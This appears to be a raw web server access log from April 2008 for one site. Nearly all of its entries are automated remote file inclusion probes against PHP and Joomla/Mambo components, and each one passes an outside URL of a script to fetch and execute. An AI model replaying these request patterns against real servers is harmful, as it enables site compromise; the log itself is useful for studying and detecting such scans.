210.245.166.86 - - [08/Apr/2008:15:19:22 -0700] "GET /logs//index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://hornydate.co.uk/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.16.16.208 - - [08/Apr/2008:15:19:40 -0700] "GET /logs/access_080308.log/senetman/html/index.php?page=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.32.94.50 - - [08/Apr/2008:15:19:47 -0700] "GET /phphtml.php?htmlclass_path=http://konfraternia.tarnow.pl/cutenews/data/.yop/button.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.133.62 - - [08/Apr/2008:15:20:01 -0700] "GET /senetman/html/index.php?page=http://www.xdengue.xpg.com.br/sefe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.32.94.50 - - [08/Apr/2008:15:20:02 -0700] "GET /logs//index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://skunk1982.altervista.org/mic22.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
216.32.94.50 - - [08/Apr/2008:15:20:04 -0700] "GET //index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://skunk1982.altervista.org/mic22.txt?? HTTP/1.1" 200 7371 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
82.100.220.46 - - [08/Apr/2008:15:20:17 -0700] "GET //ccmail/modules/links/submit_links.php?rootdp=zZz&gsLanguage=http://www.chiefsfaulerknecht.de//smile-i.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.80.42.159 - - [08/Apr/2008:15:20:26 -0700] "GET /logs/access_080207.log/components/com_joomlaboard/file_upload.php?sbp=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.80.42.159 - - [08/Apr/2008:15:20:27 -0700] "GET /components/com_joomlaboard/file_upload.php?sbp=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.80.42.159 - - [08/Apr/2008:15:20:27 -0700] "GET /logs/components/com_joomlaboard/file_upload.php?sbp=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.117.154.85 - - [08/Apr/2008:15:20:36 -0700] "GET /logs/access_080108.log//components/minibb/index.php?absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
77.221.130.16 - - [08/Apr/2008:15:20:38 -0700] "GET /senetman/html/index.php?page=http://xdengue01.iespana.es/bds/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.117.154.85 - - [08/Apr/2008:15:20:39 -0700] "GET /logs/access_071220.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.117.154.85 - - [08/Apr/2008:15:20:39 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.117.154.85 - - [08/Apr/2008:15:20:40 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.22.2.74 - - [08/Apr/2008:15:20:41 -0700] "GET /logs/access_080223.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://203.71.212.3/www/modul/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
216.22.2.74 - - [08/Apr/2008:15:20:42 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://203.71.212.3/www/modul/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
122.152.129.54 - - [08/Apr/2008:15:20:45 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Baiduspider+(+http://www.baidu.com/search/spider_jp.html)" "www.dmulk.com"
216.22.2.74 - - [08/Apr/2008:15:20:54 -0700] "GET /logs/access_080117.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://203.71.212.3/www/modul/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
59.125.203.211 - - [08/Apr/2008:15:20:57 -0700] "GET /logs/access_080219.log/index.php?option=com_jd-wp&task=cat_view&gid=&mosConfig_absolute_path=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.125.203.211 - - [08/Apr/2008:15:21:00 -0700] "GET /index.php?option=com_jd-wp&task=cat_view&gid=&mosConfig_absolute_path=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 200 7371 "-" "libwww-perl/5.805" "www.dmulk.com"
59.125.203.211 - - [08/Apr/2008:15:21:02 -0700] "GET /logs/index.php?option=com_jd-wp&task=cat_view&gid=&mosConfig_absolute_path=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.117.154.85 - - [08/Apr/2008:15:21:12 -0700] "GET /logs/access_071212.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.113.108.77 - - [08/Apr/2008:15:21:32 -0700] "GET /logs/access_080308.log/senetman/html/index.php?page=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.113.108.77 - - [08/Apr/2008:15:21:33 -0700] "GET /senetman/html/index.php?page=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.113.108.77 - - [08/Apr/2008:15:21:33 -0700] "GET /logs/senetman/html/index.php?page=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.113.108.77 - - [08/Apr/2008:15:21:36 -0700] "GET /logs/access.log/senetman/html/index.php?page=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.195.37.167 - - [08/Apr/2008:15:21:44 -0700] "GET /logs/access_070727.log HTTP/1.0" 200 35863 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.37.167 - - [08/Apr/2008:15:21:45 -0700] "GET /logs/access_080123.log HTTP/1.0" 200 638144 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.17.106 - - [08/Apr/2008:15:22:09 -0700] "GET /logs/access_070924.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
207.58.138.111 - - [08/Apr/2008:15:22:25 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://theninjalegion.com/etc/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
207.58.138.111 - - [08/Apr/2008:15:22:25 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://theninjalegion.com/etc/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
217.16.16.208 - - [08/Apr/2008:15:22:42 -0700] "GET /senetman/html/index.php?page=http://xdengue01.iespana.es/bds/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
75.126.70.242 - - [08/Apr/2008:15:22:46 -0700] "GET /logs/access.log/senetman/html/index.php?page=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.126.70.242 - - [08/Apr/2008:15:22:46 -0700] "GET /senetman/html/index.php?page=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.126.70.242 - - [08/Apr/2008:15:22:46 -0700] "GET /logs/senetman/html/index.php?page=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.126.70.242 - - [08/Apr/2008:15:22:57 -0700] "GET /logs/access.log/senetman/html/index.php?page=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.126.70.242 - - [08/Apr/2008:15:22:57 -0700] "GET /senetman/html/index.php?page=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.126.70.242 - - [08/Apr/2008:15:22:57 -0700] "GET /logs/senetman/html/index.php?page=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
210.245.166.86 - - [08/Apr/2008:15:23:01 -0700] "GET /logs/access_080122.log/errors.php?error=http://hornydate.co.uk/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.245.166.86 - - [08/Apr/2008:15:23:01 -0700] "GET /errors.php?error=http://hornydate.co.uk/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.245.166.86 - - [08/Apr/2008:15:23:02 -0700] "GET /logs/errors.php?error=http://hornydate.co.uk/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.105.33.158 - - [08/Apr/2008:15:23:28 -0700] "GET /logs/access.log/main.php?x=http://redrumfans.com/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.105.33.158 - - [08/Apr/2008:15:23:36 -0700] "GET /main.php?x=http://redrumfans.com/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.105.33.158 - - [08/Apr/2008:15:23:44 -0700] "GET /logs/main.php?x=http://redrumfans.com/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
60.249.45.142 - - [08/Apr/2008:15:24:02 -0700] "GET /logs/access_080219.log//mcf.php?content=http://www.paolodune.it/.ownz/safeon.dat?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.105.33.158 - - [08/Apr/2008:15:24:15 -0700] "GET /logs/access.log/index2.php?x=http://redrumfans.com/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
60.249.42.221 - - [08/Apr/2008:15:24:25 -0700] "GET /logs/access_080308.log/update/update5.php?lang=http://www.paolodune.it/.ownz/safeon.dat?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.67.120.48 - - [08/Apr/2008:15:24:26 -0700] "GET /update/update5.php?lang=http://www.paolodune.it/.ownz/safeon.dat?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
60.249.45.142 - - [08/Apr/2008:15:24:26 -0700] "GET /logs/update/update5.php?lang=http://www.paolodune.it/.ownz/safeon.dat?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
60.249.45.142 - - [08/Apr/2008:15:24:27 -0700] "GET /logs/access_080219.log/update/update5.php?lang=http://www.paolodune.it/.ownz/safeon.dat?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.57.156.36 - - [08/Apr/2008:15:25:32 -0700] "GET /logs/access.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://barefootscience.com/usa/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.57.156.36 - - [08/Apr/2008:15:25:33 -0700] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://barefootscience.com/usa/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.57.156.36 - - [08/Apr/2008:15:25:33 -0700] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://barefootscience.com/usa/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.93.56.80 - - [08/Apr/2008:15:25:38 -0700] "GET /logs/access.log/components/com_anjel/anjel.index.php?mosConfig_absolute_path=http://h1.ripway.com/dokter/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.93.56.80 - - [08/Apr/2008:15:25:39 -0700] "GET /components/com_anjel/anjel.index.php?mosConfig_absolute_path=http://h1.ripway.com/dokter/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.93.56.80 - - [08/Apr/2008:15:25:39 -0700] "GET /logs/components/com_anjel/anjel.index.php?mosConfig_absolute_path=http://h1.ripway.com/dokter/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.80.42.159 - - [08/Apr/2008:15:25:55 -0700] "GET /logs/access_080329.log/components/com_joomlaboard/file_upload.php?sbp=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.222.36.82 - - [08/Apr/2008:15:26:07 -0700] "GET /logs/access_080313.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://61.129.163.4/on.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.125.175.18 - - [08/Apr/2008:15:27:18 -0700] "GET /logs/access.log/senetman/html/index.php?page=http://203.71.212.3/www/modul/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.125.175.18 - - [08/Apr/2008:15:27:18 -0700] "GET /senetman/html/index.php?page=http://203.71.212.3/www/modul/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.125.175.18 - - [08/Apr/2008:15:27:18 -0700] "GET /logs/senetman/html/index.php?page=http://203.71.212.3/www/modul/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.73.103.57 - - [08/Apr/2008:15:27:59 -0700] "GET /logs/access_071229.log/index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://bergen.pap.no/includes/echo3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.73.103.57 - - [08/Apr/2008:15:28:01 -0700] "GET /index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://bergen.pap.no/includes/echo3.txt? HTTP/1.1" 200 7371 "-" "libwww-perl/5.808" "www.dmulk.com"
216.73.103.57 - - [08/Apr/2008:15:28:01 -0700] "GET /logs/index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://bergen.pap.no/includes/echo3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
210.245.166.86 - - [08/Apr/2008:15:28:05 -0700] "GET /logs/access_080131.log//index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://hornydate.co.uk/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.57.174.66 - - [08/Apr/2008:15:28:11 -0700] "GET /logs/access_071220.log//admin/spaw/spaw_control.class.php?spaw_root=http://danthefarrier.co.uk/id/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.57.174.66 - - [08/Apr/2008:15:28:11 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://danthefarrier.co.uk/id/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.57.174.66 - - [08/Apr/2008:15:28:11 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://danthefarrier.co.uk/id/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.12.28 - - [08/Apr/2008:15:28:17 -0700] "GET /bikes/GPS/WeSTOC2008/?D=A HTTP/1.0" 200 842 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
69.57.174.66 - - [08/Apr/2008:15:28:23 -0700] "GET /logs/access_071212.log//admin/spaw/spaw_control.class.php?spaw_root=http://danthefarrier.co.uk/id/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.50.100.222 - - [08/Apr/2008:15:28:23 -0700] "GET /logs/access_080218.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.50.100.222 - - [08/Apr/2008:15:28:24 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.50.100.222 - - [08/Apr/2008:15:28:24 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.72.191.2 - - [08/Apr/2008:15:28:49 -0700] "GET /logs/access_080313.log/index.php?sayfa=http://www.oberreiter.com/haunz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.58.133.62 - - [08/Apr/2008:15:28:54 -0700] "GET /logs/access.log/senetman/html/index.php?page=http://www.xdengue.xpg.com.br/sefe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.133.62 - - [08/Apr/2008:15:28:54 -0700] "GET /logs/senetman/html/index.php?page=http://www.xdengue.xpg.com.br/sefe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
211.21.48.203 - - [08/Apr/2008:15:28:57 -0700] "GET /logs/access_080131.log//index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.193.246.175 - - [08/Apr/2008:15:29:08 -0700] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.29.67.38 - - [08/Apr/2008:15:29:26 -0700] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.126.70.242 - - [08/Apr/2008:15:29:29 -0700] "GET /logs/access_080308.log/senetman/html/index.php?page=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.93.56.80 - - [08/Apr/2008:15:29:42 -0700] "GET /logs/access_080119.log/components/com_anjel/anjel.index.php?mosConfig_absolute_path=http://h1.ripway.com/dokter/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.15.220.158 - - [08/Apr/2008:15:29:42 -0700] "GET /logs/access_080122.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://67.15.84.42/~spencerg/modules/.log/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
83.15.220.158 - - [08/Apr/2008:15:29:43 -0700] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://67.15.84.42/~spencerg/modules/.log/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
83.15.220.158 - - [08/Apr/2008:15:29:44 -0700] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://67.15.84.42/~spencerg/modules/.log/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
80.93.56.80 - - [08/Apr/2008:15:29:46 -0700] "GET /components/com_anjel/anjel.index.php?mosConfig_absolute_path=http://h1.ripway.com/dokter/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.117.154.85 - - [08/Apr/2008:15:29:55 -0700] "GET /logs/access_071220.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.117.154.85 - - [08/Apr/2008:15:29:56 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.117.154.85 - - [08/Apr/2008:15:29:56 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
75.126.70.242 - - [08/Apr/2008:15:29:59 -0700] "GET /logs/access_080308.log/senetman/html/index.php?page=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.130.178 - - [08/Apr/2008:15:30:16 -0700] "GET /logs/access_071220.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.geocities.com/koeluna/asik.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.130.178 - - [08/Apr/2008:15:30:16 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.geocities.com/koeluna/asik.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.186.1.54 - - [08/Apr/2008:15:30:24 -0700] "GET //public_html/errors.php?error=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
75.125.175.18 - - [08/Apr/2008:15:30:25 -0700] "GET /logs/access_080308.log/senetman/html/index.php?page=http://203.71.212.3/www/modul/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.67.208.250 - - [08/Apr/2008:15:30:31 -0700] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.130.178 - - [08/Apr/2008:15:30:32 -0700] "GET /logs/access_071212.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.geocities.com/koeluna/asik.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.55.168.243 - - [08/Apr/2008:15:30:33 -0700] "GET /logs/index.php?option=com_rssxt&Itemid=&mosConfig_absolute_path=http://www.garcongay.com/mambots/content/geshi/geshi/cms.php/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
72.55.168.243 - - [08/Apr/2008:15:30:34 -0700] "GET /index.php?option=com_rssxt&Itemid=&mosConfig_absolute_path=http://www.garcongay.com/mambots/content/geshi/geshi/cms.php/boo.do??? HTTP/1.1" 200 7371 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
216.117.154.85 - - [08/Apr/2008:15:30:34 -0700] "GET /logs/access_071212.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.52.130.178 - - [08/Apr/2008:15:30:43 -0700] "GET /logs/access_071220.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.geocities.com/koeluna/asik.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.130.178 - - [08/Apr/2008:15:30:43 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.geocities.com/koeluna/asik.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.34.169.20 - - [08/Apr/2008:15:30:44 -0700] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.6.22.119 - - [08/Apr/2008:15:30:49 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.24.221 - - [08/Apr/2008:15:30:52 -0700] "GET /minamijewelry/source_images/updated1/?N=A HTTP/1.0" 200 1427 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.52.130.178 - - [08/Apr/2008:15:30:57 -0700] "GET /logs/access_071212.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.geocities.com/koeluna/asik.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.133.62 - - [08/Apr/2008:15:31:05 -0700] "GET /logs/access_080308.log/senetman/html/index.php?page=http://www.xdengue.xpg.com.br/sefe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.213.0.1 - - [08/Apr/2008:15:31:20 -0700] "GET /logs/access_080218.log//public_html/errors.php?error=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.213.0.1 - - [08/Apr/2008:15:31:21 -0700] "GET //public_html/errors.php?error=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.213.0.1 - - [08/Apr/2008:15:31:22 -0700] "GET /logs//public_html/errors.php?error=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.50.100.222 - - [08/Apr/2008:15:31:24 -0700] "GET /logs/access_080308.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.221.130.16 - - [08/Apr/2008:15:31:51 -0700] "GET /logs/access.log/senetman/html/index.php?page=http://xdengue01.iespana.es/bds/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.16 - - [08/Apr/2008:15:31:51 -0700] "GET /logs/senetman/html/index.php?page=http://xdengue01.iespana.es/bds/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.117.154.85 - - [08/Apr/2008:15:32:55 -0700] "GET /logs/access_071220.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.117.154.85 - - [08/Apr/2008:15:32:56 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
